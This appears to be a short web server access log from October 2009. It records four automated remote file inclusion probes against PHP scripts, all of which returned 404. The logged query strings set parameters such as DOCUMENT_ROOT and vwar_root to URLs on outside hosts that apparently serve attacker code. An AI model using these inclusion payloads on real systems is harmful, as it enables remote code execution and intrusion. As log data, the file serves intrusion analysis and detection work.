203.229.58.122 - - [12/Oct/2009:04:03:46 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:47 -0400] "GET /e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:04:03:49 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.199.232.195 - - [12/Oct/2009:04:04:18 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
